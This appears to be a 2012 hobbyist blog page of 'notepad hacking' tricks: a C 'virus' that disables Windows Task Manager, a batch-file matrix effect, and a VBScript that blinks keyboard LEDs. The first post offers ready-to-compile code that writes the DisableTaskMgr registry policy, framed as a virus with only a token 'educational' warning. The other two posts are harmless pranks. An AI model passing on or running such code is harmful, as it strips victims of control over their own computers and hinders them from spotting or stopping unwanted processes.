Showing posts with label notepad hacking. Show all posts
Showing posts with label notepad hacking. Show all posts

Sunday, December 2, 2012

virus code that will disable task manager

WARNING : Only for Educational Purpose



#include<stdio.h>
void main()
{

system("REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v DisableTaskMgr /t REG_DWORD /d 1");

}
compile it using any c compiler like dev C++ or turboo C








Monday, October 22, 2012

create matrix effect with notepad


create matrix effect with notepad


just follow the steps and see the amazing matrix effect happen in your DOS window:


* Open Notepad.
* Copy the below mentioned text in your notepad file:

@echo off
color 02
:start

echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%

goto start

* Save the file with .bat extension like Matrix.bat

Just open the file to see the matrix effect right before your eyes!




Saturday, October 6, 2012

Keyboard LED dancing tricks

Keyboard LED dancing tricks
1. Open Notepad and copy below codes into it.
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

2. Then save this file as led.vbs (.vbs is must)
3. Open your save file and see your keyboard led blinking like disco lights.

Search This Blog